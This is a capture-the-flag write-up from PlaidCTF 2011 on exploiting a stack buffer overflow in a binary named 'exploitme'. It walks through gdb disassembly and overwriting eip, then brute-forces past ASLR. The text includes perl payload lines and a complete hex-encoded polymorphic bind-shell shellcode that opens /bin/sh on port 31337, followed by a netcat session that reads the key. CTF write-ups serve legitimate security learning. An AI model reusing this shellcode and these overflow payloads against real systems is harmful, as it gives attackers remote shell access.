Write-up - PlaidCTF 2011 - Another small bug

by Jonathan Salwan - 2011-04-25

This challenge it's a classical binary exploitation with aslr.

let's reverse it with gdb.

0x08048193 : cmpl $0x2,0x8(%ebp)
0x08048197 : je 0x80481ba

Check if argc != 2

0x080481ba : mov 0xc(%ebp),%eax
0x080481bd : add $0x4,%eax
0x080481c0 : mov (%eax),%eax
0x080481c2 : mov %eax,(%esp)
0x080481c5 : call 0x80483e8

Then, it put argc in eax, adds 4 to gets argv[1] and calls strtoul with argv[1] in arguments.

0x080481fc : mov 0x804b49c,%edx   <= pointer on stdin
0x08048202 : mov 0x21c(%esp),%eax <= results of strtoul
0x08048209 : mov %edx,0x8(%esp)
0x0804820d : mov %eax,0x4(%esp)
0x08048211 : lea 0x1c(%esp),%eax  <= addr on pointer
0x08048215 : mov %eax,(%esp)
0x08048218 : call 0x80486b4 <fgets_unlocked>

After, it calls the fgets_unlocked function. From here, we can say the binary do like this

fgets_unlocked(&buff, strtoul(argv[1]), stdin)

Let's exploit it

z2_12@a5:~$ echo `perl -e 'print "a"x532 ."BBBB"'` | ./exploitme 999999
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBB

Segmentation fault (core dumped)
jonathan@ArchLinux [19-Another_small_bug] $ gdb -c core
GNU gdb (GDB) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
For bug reporting instructions, please see:
.
[New Thread 9249]
Core was generated by `./exploitme 999999'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()

Woot, we control eip.

Now, we can brutforce eip to bypass the ASLR. For the shellcode we use a classical binport. (shellcode nc -lp 31337 -e /bin//sh polymorphic (91 bytes)).

z2_12@a5:~$ export EGG=`perl -e 'print "\x90"x32000 ."\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e
\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5\x40\x87\x9d
\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86
\x88\xbe\x16\x02\xb5\x96\x1d\x29\x34\x34\x34\xa3\x98\x55\x62\xa1\xa5\x55\x68\x66\x68\x68\x6c
\x55\x62\x9a\x55\x64\x97\x9e\xa3\x64\x64\xa8\x9d"'`

z2_12@a5:~$ echo `perl -e 'print "a"x524 ."\xd2\x51\x84\xbf"x10'` > file
z2_12@a5:~$ while true ; do /opt/pctf/z2/exploitme 99999999 < file ; done

z2_12@a5:~$ netcat 127.0.0.1 31337
^[[A
ls
file
getenv
getenv.c
cat /opt/pctf/z2/key
This is the key: EASTEREGGHUNTS_ARE_FUN
^C
z2_12@a5:~$

The key is EASTEREGGHUNTS_ARE_FUN.